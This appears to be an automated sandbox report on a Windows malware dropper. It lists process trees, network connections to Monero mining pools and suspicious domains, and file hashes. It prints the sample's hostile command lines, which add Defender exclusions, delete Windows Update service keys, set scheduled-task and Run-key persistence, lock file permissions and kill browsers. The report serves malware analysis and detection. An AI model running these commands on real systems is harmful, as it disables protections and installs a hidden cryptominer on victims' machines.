PID 3900 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 1592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3900 wrote to memory of 4536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4612 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 1792 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 4748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 4748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 3592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 3592 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 4612 wrote to memory of 384 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe

"C:\Users\Admin\AppData\Local\Temp\7d0417ec0e02002489cda78b4fd5d4dc57d4957a00287b4eb24c8cec8c68caad.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=

Network

Country Destination Domain Proto
US 8.8.8.8:53 134.121.24.20.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 203.151.224.20.in-addr.arpa udp
GB 96.16.110.41:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.67.17:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 17.67.15.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.65.182:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 182.65.15.51.in-addr.arpa udp

Files

memory/1016-133-0x0000000000E10000-0x000000000126A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 61246e63964a1d50af9a3cf9c4e17798
SHA1 098ca418434983f9a4e013127311d14639acea08
SHA256 b768455072e94994ed5f2fc9b02a77640fb81f0dbe2124065d66a60f78cd3f6e
SHA512 bcd472bfbe4b9b498f75ae6e7ea47850ac243eac7c377b94aba3676a0bd32d3e78132a30ffadf51cfa03b0fd33c1743abcedf6517fc48426d85b1d1fe33303b7

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/976-173-0x0000000002EB0000-0x0000000003020000-memory.dmp

memory/976-174-0x0000000003020000-0x0000000003151000-memory.dmp

memory/1796-177-0x00007FF754C10000-0x00007FF754FCD000-memory.dmp

memory/976-178-0x0000000003020000-0x0000000003151000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/4248-183-0x00000101F0710000-0x00000101F0732000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpzs0ftj.5oo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4248-193-0x00000101F0770000-0x00000101F0780000-memory.dmp

memory/4248-194-0x00000101F0770000-0x00000101F0780000-memory.dmp

memory/4248-195-0x00000101F0770000-0x00000101F0780000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e8ce785f8ccc6d202d56fefc59764945
SHA1 ca032c62ddc5e0f26d84eff9895eb87f14e15960
SHA256 d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4
SHA512 66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

memory/4560-209-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

memory/4560-210-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

memory/4560-211-0x0000019826FC0000-0x0000019826FD0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/1796-215-0x00007FF754C10000-0x00007FF754FCD000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35619dd2acc340c0d6839efdfbc55bb1
SHA1 73fde0c7a79d159d05f6d0e93bc37ff5d16908a0
SHA256 399f5103bea78e25d4cb61e7ccbb2f2fd4b8e72b4ad1dc4538e3a7747fab5c7a
SHA512 9470b2d38e70bee68d0fac054bf6b032fbeef2d726cbe24dbd00dd6a58e0ca837f28d600b5ffa564e9a833ae7cb3370a1abc4fe402514849e0708be326926832

memory/3356-226-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

memory/3356-227-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

memory/3356-228-0x000001C5B9520000-0x000001C5B9530000-memory.dmp

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/704-231-0x00007FF772E40000-0x00007FF7731FD000-memory.dmp

memory/2296-246-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-245-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-244-0x000002CAF8B30000-0x000002CAF8B40000-memory.dmp

memory/2296-256-0x000002CAFAED0000-0x000002CAFAEEC000-memory.dmp

memory/2296-257-0x000002CAFAEC0000-0x000002CAFAECA000-memory.dmp

memory/2296-258-0x00007FF4517F0000-0x00007FF451800000-memory.dmp

memory/2296-259-0x000002CAFB110000-0x000002CAFB12C000-memory.dmp

memory/2296-260-0x000002CAFB0F0000-0x000002CAFB0FA000-memory.dmp

memory/2296-261-0x000002CAFB150000-0x000002CAFB16A000-memory.dmp

memory/2296-262-0x000002CAFB100000-0x000002CAFB108000-memory.dmp

memory/2296-263-0x000002CAFB130000-0x000002CAFB136000-memory.dmp

memory/2296-264-0x000002CAFB140000-0x000002CAFB14A000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

memory/4724-268-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

memory/4724-269-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

memory/4724-289-0x0000019D2E800000-0x0000019D2E810000-memory.dmp

memory/4724-290-0x00007FF4FBC30000-0x00007FF4FBC40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/4724-293-0x0000019D2E809000-0x0000019D2E80F000-memory.dmp

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Program Files\Google\Libs\g.log

MD5 fdba80d4081c28c65e32fff246dc46cb
SHA1 74f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256 b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512 b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

memory/704-300-0x00007FF772E40000-0x00007FF7731FD000-memory.dmp

memory/4296-301-0x0000028016680000-0x00000280166A0000-memory.dmp

memory/4296-302-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-303-0x00000280166C0000-0x0000028016700000-memory.dmp

memory/2624-304-0x00007FF7819C0000-0x00007FF7819D6000-memory.dmp

memory/4296-305-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-307-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-308-0x0000028016CB0000-0x0000028016CD0000-memory.dmp

memory/4296-310-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-311-0x0000028016CB0000-0x0000028016CD0000-memory.dmp

memory/4296-313-0x00007FF784410000-0x00007FF784C04000-memory.dmp

memory/4296-315-0x00007FF784410000-0x00007FF784C04000-memory.dmp